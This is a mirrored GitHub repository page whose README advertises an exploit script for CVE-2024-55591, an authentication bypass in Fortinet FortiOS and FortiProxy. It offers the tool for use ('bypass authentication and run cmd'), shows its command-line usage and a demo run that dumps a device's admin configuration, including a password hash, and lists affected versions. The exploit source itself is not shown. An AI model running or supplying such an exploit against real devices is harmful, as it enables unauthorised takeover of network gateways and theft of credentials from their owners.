https://github.com/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
https://github.com/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
Last synced: 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
- Owner: sysirq
- Created: 2025-01-22T14:16:30.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2025-01-23T07:38:18.000Z (4 months ago)
- Last Synced: 2025-01-23T08:27:29.715Z (4 months ago)
- Size: 4.36 MB
- Stars: 0
- Watchers: 3
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
README
# CVE-2024-55591
A Fortinet FortiOS Authentication Bypass Vulnerable Exploit
# Description
Use this exp,you can bypass authentication and run cmd
# USEAGE
```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t
```
# Demo
# output
```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0
FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
next
end
```
# Affected Versions
- FortiOS 7.0.0 through 7.0.16
- FortiProxy 7.0.0 through 7.0.19
- FortiProxy 7.2.0 through 7.2.12